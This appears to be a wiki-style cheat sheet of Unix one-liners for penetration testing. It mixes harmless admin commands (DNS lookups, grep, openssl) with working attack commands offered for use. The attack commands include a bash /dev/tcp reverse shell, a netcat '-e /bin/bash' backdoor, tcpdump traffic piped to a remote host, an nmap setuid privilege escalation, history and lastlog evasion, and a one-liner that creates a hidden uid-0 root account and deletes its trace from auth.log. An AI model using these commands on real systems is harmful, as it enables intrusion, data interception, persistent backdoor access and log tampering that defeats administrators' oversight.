Resolve a list of hostnames to IP addresses
awk < hostnames.txt '{ system("resolveip -s " $1) }'IIS 6.0 IP Disclosure
curl -l -O -H "Host:" "example.com"Connect to SSL websites
openssl s_client -connect example.com:443Convert base64 to text
echo 'base64string' | base64 -d (Use -D on OSX)Decode ASCII shellcode
echo -e *shellcode hex string* (may need to use -i to ignore bad chars)Enumerate DNS of Class C
for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; doneSSH to box and hide from "who" and "lastlog"
ssh andrew@10.1.1.1 -T /bin/bashPrevent terminal logging
unset HISTFILEAdd immutable attribute to a unix file
chattr +i *file*SSH into host2 through host1
ssh -o "proxycommand ssh -W host2 host1" host2Nmap setuid privesc
nmap --script <(echo 'os.execute("/bin/sh")')
nmap --interactive (for older versions)Transfer files through SSH
ssh test@10.1.1.1 "cat test.tar.gz" > test.tar.gzInternal port redirect for bypassing services
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444Enable forwarding on the fly
sysctl -w net.ipv4.ip_forward=1Kill with USR1 developer defined signal
kill -USR1 <pid>Pull IP addresses from a file
grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'Sniff traffic with tcpdump and send to remote tcp socket
tcpdump -w - | nc -v 8.8.8.8 9999Recursively search for text contained in files within a directory
zcat -rf ./* | grep "searchstring"Recursively search for files with the specified word within them Submitted by cat on Google Fourms
ls -a | find | grep -i "string"Netcat backdoor Does not work with most distro's default version of netcat (most do not define ENABLE_GAPING_SECURITY_HOLE which turns on -e)
nc -e /bin/bash *remotecomputer* *port*
OR
nc -e /bin/bash -lp *port*View CPU Information
cat /proc/cpuinfoBash reverse shell (@icleus)
Works on all (recent) distributions where egress filtering is not in place / quite open, use this to reverse connect to your listening host.
bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 &I find this best works with a socat listener due to the readline support.
socat readline TCP-LISTEN:1234One line root useradd It creates a new root user. You have to change some parameters.
USERNAME="name";PASSWD=`perl -e 'print crypt("password", "sa")'`;COMMENT="Comment Here" && sudo useradd -p $PASSWD --system --shell '/bin/bash' --base-dir "/bin" --uid 0 --non-unique --comment $COMMENT $USERNAME && sudo sed -i '/useradd/d;/$USERNAME/d;' /var/log/auth.logCredits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions)